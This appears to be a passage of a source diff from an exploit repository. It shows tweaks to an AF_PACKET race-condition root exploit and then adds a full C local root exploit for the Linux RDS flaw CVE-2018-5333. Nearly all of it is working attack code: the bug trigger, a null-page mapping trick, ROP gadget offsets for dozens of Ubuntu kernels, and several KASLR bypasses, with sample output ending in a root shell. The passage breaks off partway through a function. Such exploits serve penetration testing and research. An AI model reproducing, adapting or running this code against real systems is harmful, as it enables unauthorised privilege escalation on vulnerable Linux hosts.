+#if ENABLE_KASLR_BYPASS_SYSLOG
     addr = get_kernel_addr_syslog();
     if (addr) return addr;
+#endif
 
+#if ENABLE_KASLR_BYPASS_MINCORE
     addr = get_kernel_addr_mincore();
     if (addr) return addr;
+#endif
 
     dprintf("[-] KASLR bypass failed\n");
     exit(EXIT_FAILURE);
@@ -851,7 +891,7 @@ void launch_rootshell(void)
     fd = open(SYSCTL_PATH, O_WRONLY);
 
     if(fd == -1) {
-        dprintf("[-] could not open %s\n", SYSCTL_PATH);
+        dprintf("[-] open(%s): %m\n", SYSCTL_PATH);
         exit(EXIT_FAILURE);
     }
 
@@ -877,12 +917,12 @@ void launch_rootshell(void)
 
 void setup_sandbox() {
     if (unshare(CLONE_NEWUSER) != 0) {
-        dprintf("[-] unshare(CLONE_NEWUSER)\n");
+        dprintf("[-] unshare(CLONE_NEWUSER): %m\n");
         exit(EXIT_FAILURE);
     }
 
     if (unshare(CLONE_NEWNET) != 0) {
-        dprintf("[-] unshare(CLONE_NEWNET)\n");
+        dprintf("[-] unshare(CLONE_NEWNET): %m\n");
         exit(EXIT_FAILURE);
     }
 }
@@ -890,8 +930,6 @@ void setup_sandbox() {
 int main(int argc, char **argv)
 {
     int status, pid;
-    struct utsname u;
-    char buf[512], *f;
 
     if (getuid() == 0 && geteuid() == 0) {
         chown("/proc/self/exe", 0, 0);
@@ -908,11 +946,11 @@ int main(int argc, char **argv)
 
     dprintf("linux AF_PACKET race condition exploit by rebel\n");
 
-    dprintf("[.] starting\n");
-
-    dprintf("[.] checking hardware\n");
-    check_procs();
-    dprintf("[~] done, hardware looks good\n");
+#if ENABLE_SYSTEM_CHECKS
+    dprintf("[.] checking system\n");
+    check_env();
+    dprintf("[~] done, looks good\n");
+#endif
 
     dprintf("[.] checking kernel version\n");
     detect_versions();

data/exploits/CVE-2018-5333/cve-2018-5333.c

@@ -0,0 +1,883 @@
+// Local root exploit for Linux RDS rds_atomic_free_op NULL pointer dereference
+// in the rds kernel module in the Linux kernel through 4.14.13 (CVE-2018-5333).
+//
+// Includes KASLR, SMEP, and mmap_min_addr bypasses. No SMAP bypass.
+//
+// Targets:
+// - Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116
+// - Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54
+//
+// The rds kernel module is not loaded by default on Ubuntu, and is blacklisted
+// in /etc/modprobe.d/blacklist-rare-network.conf to prevent autoloading.
+// - install: sudo apt install "linux-image-extra-$(uname -r)-generic"
+// - load:    sudo insmod "/lib/modules/$(uname -r)/kernel/net/rds/rds.ko"
+//
+// This exploit is a modified extension of the original local root
+// proof of concept exploit written by wbowling as an example of using
+// CVE-2019-9213 to make previous kernel bugs exploitable:
+// - https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4
+//
+// The original exploit is based on the null pointer dereference
+// reproducer proof of concept and analysis by 0x36:
+// - https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+//
+// wbowling has done most of the hard work, by utilising Jann Horn's
+// mmap_min_addr bypass technique (CVE-2019-9213), allowing userland to mmap
+// virtual address 0 (without which this bug would not be exploitable on
+// systems with a sufficiently large value for vm.mmap_min_addr);
+// and developing the appropriate ROP chain.
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+//
+// This exploit adds offsets for additional kernels, and introduces some
+// additional features, such as KASLR bypasses and system checks, including:
+// - check if system supports SMAP
+// - check if system supports RDS sockets
+// - Jann Horn's mincore KASLR bypass via heap page disclosure (CVE-2017-16994)
+//   - https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+// - spender's /proc/kallsyms KASLR bypass (requires kernel.kptr_restrict=0)
+//   - https://grsecurity.net/~spender/exploits/exploit.txt
+// - xairy's syslog KASLR bypass (requires kernel.dmesg_restrict=0)
+//   - https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+// - lizzie's perf_event_open KASLR bypass (requires kernel.perf_event_paranoid<2)
+//   - https://blog.lizzie.io/kaslr-and-perf.html
+//
+// Shoutout to nstarke for adding additional kernel offsets.
+// - https://github.com/bcoles/kernel-exploits/pulls?q=author:nstarke+cve-2018-5333
+//
+// This exploit also uses various code patterns copied from:
+// - xairy's exploits:
+//   - https://github.com/xairy/kernel-exploits
+// - vnik's kernel ROP code:
+//   - https://github.com/vnik5287/kernel_rop
+// ---
+// $ gcc cve-2018-5333.c -o cve-2018-5333 -Wall
+// $ ./cve-2018-5333
+// Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)
+// [.] checking kernel version...
+// [.] kernel version '4.4.0-116-generic #140-Ubuntu' detected
+// [~] done, version looks good
+// [.] checking system...
+// [~] done, looks good
+// [.] mapping null address...
+// [~] done, mapped null address
+// [.] KASLR bypass enabled, getting kernel base address
+// [.] trying /proc/kallsyms...
+// [-] kernel base not found in /proc/kallsyms
+// [.] trying syslog...
+// [-] kernel base not found in syslog
+// [.] trying perf_event_open sampling...
+// [.] done, kernel text:   ffffffff9f000000
+// [.] commit_creds:        ffffffff9f0a4cf0
+// [.] prepare_kernel_cred: ffffffff9f0a50e0
+// [.] mmapping fake stack...
+// [~] done, fake stack mmapped
+// [.] executing payload 0x402119...
+// [+] got root
+// # id
+// uid=0(root) gid=0(root) groups=0(root)
+// ---
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2018-5333
+// <bcoles@gmail.com>
+
+#define _GNU_SOURCE
+
+#include <fcntl.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <linux/perf_event.h>
+#include <netinet/in.h>
+#include <sys/ioctl.h>
+#include <sys/klog.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/utsname.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define ENABLE_SYSTEM_CHECKS            1
+#define ENABLE_KASLR_BYPASS             1
+
+#if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN               0xffffffff00000000ul
+#  define KERNEL_BASE_MAX               0xffffffffff000000ul
+#  define ENABLE_KASLR_BYPASS_KALLSYMS  1
+#  define ENABLE_KASLR_BYPASS_SYSLOG    1
+#  define ENABLE_KASLR_BYPASS_PERF      1
+#  define ENABLE_KASLR_BYPASS_MINCORE   1
+#endif
+
+// Can be overwritten by argv[1]
+char *SHELL = "/bin/sh";
+
+// Will be overwritten if ENABLE_KASLR_BYPASS is enabled (1)
+unsigned long KERNEL_BASE = 0xffffffff81000000ul;
+
+// Will be overwritten by detect_versions().
+int kernel = -1;
+
+// kernel target struct, using ROP chain from wbowling's exploit
+struct kernel_info {
+  const char* kernel_version;
+  uint64_t commit_creds;
+  uint64_t prepare_kernel_cred;
+  uint64_t xor_rdi;     //: xor edi, edi ; ret
+  uint64_t mov_rdi_rax; //: mov rdi, rax ; pop rbx ; mov rax, rdi ; pop r12 ; pop rbp ; ret
+  uint64_t xchg_esp;    //: xchg eax, esp ; shr bl, 0xbf ; xor eax, eax ; pop rbp ; ret
+  uint64_t swapgs;      //: swapgs ; pop rbp ; ret
+  uint64_t iretq;       //: iretq
+};
+
+// Targets
+struct kernel_info kernels[] = {
+  { "4.4.0-21-generic #37-Ubuntu",   0xa21c0, 0xa25b0, 0x5d0c5, 0x178157, 0x3f8158, 0x64644, 0x4cc7da },
+  { "4.4.0-22-generic #40-Ubuntu",   0xa2220, 0xa2610, 0x5d0c5, 0x178217, 0x3f89e8, 0x64644, 0x7d005  },
+  { "4.4.0-24-generic #43-Ubuntu",   0xa2340, 0xa2730, 0x5d0c5, 0x178447, 0x3f98b8, 0x64644, 0x7d125  },
+  { "4.4.0-28-generic #47-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x178717, 0x3f9f38, 0x64644, 0x585dc  },
+  { "4.4.0-31-generic #50-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x1787a7, 0x3ffed8, 0x64644, 0x7d125  },
+  { "4.4.0-38-generic #57-Ubuntu",   0xa2570, 0xa2960, 0x5d0c5, 0x178a97, 0x400968, 0x64634, 0x7d1e5  },
+  { "4.4.0-42-generic #62-Ubuntu",   0xa25c0, 0xa29b0, 0x5d0c5, 0x178ac7, 0x400d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-98-generic #121-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x17a427, 0x40a138, 0x64694, 0x4b243  },
+  { "4.4.0-108-generic #131-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-109-generic #132-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-112-generic #135-Ubuntu", 0xa3a90, 0xa3e80, 0x5d0c5, 0x17b657, 0x40b238, 0x646a4, 0x54137c },
+  { "4.4.0-116-generic #140-Ubuntu", 0xa4cf0, 0xa50e0, 0x5e0c5, 0x17d5d7, 0x40ed08, 0x65734, 0x3a5b04 },
+
+  /* Untested:
+  { "4.4.0-51-generic #72-Ubuntu",   0xa2670, 0xa2a60, 0x5d0c5, 0x178cf7, 0x404d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-62-generic #83-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179747, 0x406a78, 0x64634, 0x7d1e5  },
+  { "4.4.0-63-generic #84-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-66-generic #87-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-70-generic #91-Ubuntu",   0xa27b0, 0xa2ba0, 0x5d0c5, 0x179847, 0x4070c8, 0x64664, 0x406eb  },
+  { "4.4.0-79-generic #100-Ubuntu",  0xa2800, 0xa2bf0, 0x5d0c5, 0x179a67, 0x408338, 0x64664, 0x7d235  },
+  { "4.4.0-87-generic #110-Ubuntu",  0xa2860, 0xa2c50, 0x5d0c5, 0x179ca7, 0x408768, 0x64694, 0x7d285  },
+  { "4.4.0-89-generic #112-Ubuntu",  0xa28a0, 0xa2c90, 0x5d0c5, 0x179d27, 0x408ae8, 0x64694, 0x7d265  },
+  { "4.4.0-96-generic #119-Ubuntu",  0xa28c0, 0xa2cb0, 0x5d0c5, 0x179e27, 0x409a48, 0x64694, 0x7d235  },
+  { "4.4.0-97-generic #120-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x179e47, 0x409a58, 0x64694, 0x4ed41  },
+  */
+
+  { "4.4.0-21-lowlatency #37-Ubuntu",   0xa3150, 0xa3560, 0x5e0c5, 0x17b2c7, 0x401288, 0x64d34, 0x7d95c },
+  { "4.4.0-22-lowlatency #40-Ubuntu",   0xa31c0, 0xa35d0, 0x5e0c5, 0x17b397, 0x401b48, 0x64d34, 0x7d9bc },
+  { "4.4.0-24-lowlatency #43-Ubuntu",   0xa32e0, 0xa36f0, 0x5e0c5, 0x17b5e7, 0x402958, 0x64d34, 0x7dadc },
+  { "4.4.0-28-lowlatency #47-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b8c7, 0x402f48, 0x64d34, 0x7dadc },
+  //{ "4.4.0-31-lowlatency #50-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409018, 0x64d34, 0x7dadc },
+  //{ "4.4.0-34-lowlatency #53-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409088, 0x64d34, 0x7dadc },
+  { "4.4.0-36-lowlatency #55-Ubuntu",   0xa3430, 0xa3840, 0x5e0c5, 0x17b9e7, 0x409318, 0x64d24, 0x7dacc },
+  { "4.4.0-38-lowlatency #57-Ubuntu",   0xa3500, 0xa3910, 0x5e0c5, 0x17bcb7, 0x409b38, 0x64d24, 0x4c030 },
+  { "4.4.0-42-lowlatency #62-Ubuntu",   0xa3560, 0xa3970, 0x5e0c5, 0x17bcf7, 0x409f68, 0x64d24, 0x7db6c },
+  { "4.4.0-98-lowlatency #121-Ubuntu",  0xa38c0, 0xa3cd0, 0x5e0c5, 0x17d737, 0x413408, 0x64d84, 0x24454 },
+  { "4.4.0-109-lowlatency #132-Ubuntu", 0xa5530, 0xa5940, 0x5f0c5, 0x17f257, 0x414c18, 0x65d94, 0x7f7ac },
+  { "4.4.0-112-lowlatency #135-Ubuntu", 0xa5bd0, 0xa5fe0, 0x5f0c5, 0x17f9a7, 0x415448, 0x65d94, 0x7f8dc },
+  { "4.4.0-116-lowlatency #140-Ubuntu", 0xa6e00, 0xa7210, 0x600c5, 0x1818f7, 0x418a38, 0x66de4, 0x809ef },
+
+  { "4.8.0-34-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-36-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-39-generic #42~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-41-generic #44~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-42-generic #45~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dea8, 0x642f4, 0x5c4f3 },
+  { "4.8.0-44-generic #47~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-45-generic #48~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-46-generic #49~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-49-generic #52~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-51-generic #54~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-52-generic #55~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-53-generic #56~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-54-generic #57~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-56-generic #61~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e278, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-58-generic #63~16.04.1-Ubuntu", 0xa5d20, 0xa6110, 0x5d0c5, 0x187797, 0x43dfa8, 0x642f4, 0x7ed5b },
+
+  { "4.8.0-34-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  { "4.8.0-36-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  //{ "4.8.0-39-lowlatency #42~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-41-lowlatency #44~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-42-lowlatency #45~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447428, 0x649f4, 0x4b3e3 },
+  { "4.8.0-44-lowlatency #47~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-45-lowlatency #48~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-46-lowlatency #49~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-49-lowlatency #52~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-51-lowlatency #54~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-52-lowlatency #55~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-53-lowlatency #56~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-54-lowlatency #57~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-56-lowlatency #61~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477f8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-58-lowlatency #63~16.04.1-Ubuntu", 0xa6ef0, 0xa7300, 0x5e0c5, 0x18aee7, 0x447568, 0x649f4, 0x7f932 },
+
+  //{ "4.10.0-14-generic #16~16.04.1-Ubuntu", 0xab610, 0xaba00, 0x600c5, 0x194ac7, 0x458288, 0x67764, 0x34c4b },
+  //{ "4.13.0-16-generic #19~16.04.3-Ubuntu", 0xa8220, 0xa85f0, 0x5f0c5, 0x19c8a7, 0x462d18, 0x668b4, 0x2f2d4 },
+  //{ "4.13.0-37-generic #42~16.04.1-Ubuntu", 0xab1d0, 0xab5a0, 0x610c5, 0x1a0827, 0x46bf58, 0x68944, 0x3381b },
+};
+
+// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
+// https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+
+#define RAND_SIZE 4096
+
+#ifndef SOL_RDS
+#  define SOL_RDS 276
+#endif
+#ifndef RDS_CMSG_MASKED_ATOMIC_CSWP
+#  define RDS_CMSG_MASKED_ATOMIC_CSWP 9
+#endif
+#ifndef AF_RDS
+#  define AF_RDS 0x15
+#endif
+
+void trigger_bug()
+{
+  struct sockaddr_in sin;
+  struct msghdr msg;
+  char buf[RAND_SIZE];
+  struct cmsghdr cmsg;
+
+  memset(&sin, 0, sizeof(struct sockaddr));
+  memset(&msg, 0, sizeof(msg));
+  memset(buf, 0x40, sizeof(buf));
+  memset(&cmsg, 0, sizeof(cmsg));
+
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
+    dprintf("[-] socket(AF_RDS): %m\n");
+    return;
+  }
+
+  sin.sin_family = AF_INET;
+  sin.sin_port = htons(2000);
+  sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+
+  bind(fd, (struct sockaddr*)&sin, sizeof(sin));
+
+  cmsg.cmsg_len = RAND_SIZE;
+  cmsg.cmsg_type = RDS_CMSG_MASKED_ATOMIC_CSWP;
+  cmsg.cmsg_level = SOL_RDS;
+
+  memcpy(&buf[0], &cmsg, sizeof(cmsg));
+
+  *(uint64_t *)(buf + 0x18) = 0x40404000; /* args->local_addr */
+
+  msg.msg_name = &sin;
+  msg.msg_namelen = sizeof(sin);
+  msg.msg_iov = NULL;
+  msg.msg_iovlen = 0;
+  msg.msg_control = buf;
+  msg.msg_controllen = RAND_SIZE;
+  msg.msg_flags = MSG_DONTROUTE|MSG_PROXY|MSG_WAITALL;
+
+  sendmsg(fd, &msg, 0);
+}
+
+// * * * * * * * * * * * * * * map null address * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+
+void map_null() {
+  void *map = mmap((void *)0x10000, 0x1000, PROT_READ | PROT_WRITE,
+    MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (map == MAP_FAILED) {
+    dprintf("[-] mmap(null): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char* path = "/proc/self/mem";
+  int fd = open(path, O_RDWR);
+
+  if (fd == -1) {
+    dprintf("open(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long addr = (unsigned long)map;
+
+  while (addr != 0) {
+    addr -= 0x1000;
+    if (lseek(fd, addr, SEEK_SET) == -1) {
+      dprintf("lseek()\n");
+      exit(EXIT_FAILURE);
+    }
+    char cmd[1000];
+    sprintf(cmd, "LD_DEBUG=help su 1>&%d", fd);
+    system(cmd);
+  }
+}
+
+// * * * * * * * * * * * * * * * save state * * * * * * * * * * * * * * *
+// https://github.com/vnik5287/kernel_rop
+
+unsigned long user_cs, user_ss, user_rflags;
+
+static void save_state() {
+  asm(
+  "movq %%cs, %0\n"
+  "movq %%ss, %1\n"
+  "pushfq\n"
+  "popq %2\n"
+  : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory");
+}
+
+// * * * * * * * * * * * * * * SIGSEGV handler * * * * * * * * * * * * * *
+
+void handler(int signo, siginfo_t* info, void* vcontext) {}
+
+void debug_enable_sigsev_handler() {
+  struct sigaction action;
+  memset(&action, 0, sizeof(struct sigaction));
+  action.sa_flags = SA_SIGINFO;
+  action.sa_sigaction = handler;
+  sigaction(SIGSEGV, &action, NULL);
+}
+
+// * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * *
+
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+  int f = open(file, O_RDONLY);
+  if (f == -1)
+    return -1;
+  int bytes_read = 0;
+  while (1) {
+    int bytes_to_read = CHUNK_SIZE;
+    if (bytes_to_read > max_length - bytes_read)
+      bytes_to_read = max_length - bytes_read;
+    int rv = read(f, &buffer[bytes_read], bytes_to_read);
+    if (rv == -1)
+      return -1;
+    bytes_read += rv;
+    if (rv == 0)
+      return bytes_read;
+  }
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+static int check_env() {
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
+    dprintf("[-] socket(AF_RDS): RDS kernel module not loaded?\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char buffer[PROC_CPUINFO_LENGTH];
+  char* path = "/proc/cpuinfo";
+  int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+  if (length == -1) {
+    dprintf("[-] open/read(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  char* found = memmem(&buffer[0], length, "smap", 4);
+  if (found != NULL) {
+    dprintf("[-] SMAP detected, no bypass available\n");
+    exit(EXIT_FAILURE);
+  }
+
+  struct stat st;
+
+  if (stat("/dev/grsec", &st) == 0) {
+    dprintf("[!] Warning: grsec is in use\n");
+  }
+
+  if (stat("/proc/sys/lkrg", &st) == 0) {
+    dprintf("[!] Warning: lkrg is in use\n");
+  }
+
+  return 0;
+}
+
+struct utsname get_kernel_version() {
+  struct utsname u;
+  int rv = uname(&u);
+  if (rv != 0) {
+    dprintf("[-] uname()\n");
+    exit(EXIT_FAILURE);
+  }
+  return u;
+}
+
+#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+#define KERNEL_VERSION_SIZE_BUFFER 512
+
+void detect_versions() {
+  struct utsname u;
+  char kernel_version[KERNEL_VERSION_SIZE_BUFFER];
+
+  u = get_kernel_version();
+
+  if (strstr(u.machine, "64") == NULL) {
+    dprintf("[-] system is not using a 64-bit kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (strstr(u.version, "-Ubuntu") == NULL) {
+    dprintf("[-] system is not using an Ubuntu kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char *u_ver = strtok(u.version, " ");
+  snprintf(kernel_version, KERNEL_VERSION_SIZE_BUFFER, "%s %s", u.release, u_ver);
+
+  int i;
+  for (i = 0; i < ARRAY_SIZE(kernels); i++) {
+    if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {
+      dprintf("[.] kernel version '%s' detected\n", kernels[i].kernel_version);
+      kernel = i;
+      return;
+    }
+  }
+
+  dprintf("[-] kernel version '%s' not recognized\n", kernel_version);
+  exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+// https://grsecurity.net/~spender/exploits/exploit.txt
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+unsigned long get_kernel_addr_kallsyms() {
+  FILE *f;
+  unsigned long addr = 0;
+  char dummy;
+  char sname[256];
+  char* name = "startup_64";
+  char* path = "/proc/kallsyms";
+
+  dprintf("[.] trying %s...\n", path);
+  f = fopen(path, "r");
+  if (f == NULL) {
+      dprintf("[-] open/read(%s): %m\n", path);
+      return 0;
+  }
+
+  int ret = 0;
+  while (ret != EOF) {
+    ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+    if (ret == 0) {
+      fscanf(f, "%s\n", sname);
+      continue;
+    }
+    if (!strcmp(name, sname)) {
+      fclose(f);
+      if (addr == 0)
+        dprintf("[-] kernel base not found in %s\n", path);
+      return addr;
+    }
+  }
+
+  fclose(f);
+  dprintf("[-] kernel base not found in %s\n", path);
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+int mmap_syslog(char** buffer, int* size) {
+  *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER): %m\n");
+    return 1;
+  }
+
+  *size = (*size / getpagesize() + 1) * getpagesize();
+  *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+  *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL): %m\n");
+    return 1;
+  }
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog_xenial(char* buffer, int size) {
+  const char* needle1 = "Freeing unused";
+  char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+  if (substr == NULL)
+    return 0;
+
+  int start = 0;
+  int end = 0;
+  for (start = 0; substr[start] != '-'; start++);
+  for (end = start; substr[end] != '\n'; end++);
+
+  const char* needle2 = "ffffff";
+  substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+
+  if (substr == NULL)
+    return 0;
+
+  char* endptr = &substr[16];
+  unsigned long addr = strtoul(&substr[0], &endptr, 16);
+
+  addr &= 0xfffffffffff00000ul;
+  addr -= 0x1000000ul;
+
+  if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+    return addr;
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog() {
+  unsigned long addr = 0;
+  char* syslog;
+  int size;
+
+  dprintf("[.] trying syslog...\n");
+
+  if (mmap_syslog(&syslog, &size))
+    return 0;
+
+  addr = get_kernel_addr_syslog_xenial(syslog, size);
+
+  if (!addr)
+    dprintf("[-] kernel base not found in syslog\n");
+
+  return addr;
+}
+#endif
+
+// * * * * * * * * * * * perf_event_open KASLR bypass * * * * * * * * * * *
+// https://blog.lizzie.io/kaslr-and-perf.html
+
+#if ENABLE_KASLR_BYPASS_PERF
+int perf_event_open(struct perf_event_attr *attr, pid_t pid, int cpu, int group_fd, unsigned long flags)
+{
+  return syscall(SYS_perf_event_open, attr, pid, cpu, group_fd, flags);
+}
+
+unsigned long get_kernel_addr_perf() {
+  int fd;
+  pid_t child;
+
+  dprintf("[.] trying perf_event_open sampling...\n");
+
+  child = fork();
+
+  if (child == -1) {
+    dprintf("[-] fork() failed: %m\n");
+    return 0;
+  }
+
+  if (child == 0) {
+    struct utsname self = {0};
+    while (1) uname(&self);
+    return 0;
+  }
+
+  struct perf_event_attr event = {
+    .type = PERF_TYPE_SOFTWARE,
+    .config = PERF_COUNT_SW_TASK_CLOCK,
+    .size = sizeof(struct perf_event_attr),
+    .disabled = 1,
+    .exclude_user = 1,
+    .exclude_hv = 1,
+    .sample_type = PERF_SAMPLE_IP,
+    .sample_period = 10,
+    .precise_ip = 1
+  };
+
+  fd = perf_event_open(&event, child, -1, -1, 0);
+
+  if (fd < 0) {
+    dprintf("[-] syscall(SYS_perf_event_open): %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
